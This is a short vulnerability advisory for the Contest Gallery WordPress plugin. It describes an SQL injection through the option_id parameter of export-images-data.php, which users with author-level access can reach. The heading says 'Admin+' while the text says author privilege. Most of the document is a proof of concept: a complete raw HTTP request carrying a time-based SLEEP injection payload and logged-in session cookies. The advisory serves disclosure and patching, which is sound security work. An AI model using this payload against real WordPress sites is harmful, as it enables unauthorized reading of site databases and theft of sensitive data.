Contest Gallery < 19.1.5 - Admin+ SQL Injection

The plugins do not escape the option_id GET parameter before concatenating it to an SQL query in export-images-data.php. This may allow malicious users with at least author privilege to leak sensitive information from the site’s database.

PoC

POST /wp-admin/admin.php?page=contest-gallery/index.php&option;_id=8+AND+(SELECT+7394+FROM+(SELECT(SLEEP(32)))UrUZ)&edit;_gallery=true HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php Content-Type: application/x-www-form-urlencoded Content-Length: 41 Origin: http://localhost:8080 Connection: close Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668473199%7CmFhoaVtvxA8yev5wAqpggBLhRsiY0PfpEBma5kPRq8T%7Cb131f9f1d3b9498930de4f620580d0214b838d43b71fdedf92328ca0032bbcdb; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668473199%7CmFhoaVtvxA8yev5wAqpggBLhRsiY0PfpEBma5kPRq8T%7Cf386bbd185ec8df8d8f91a0b8e8c5431b81e06b292212515a24d8c73b7d47d52; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668300399 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 contest_gal1ery_post_create_data_csv=true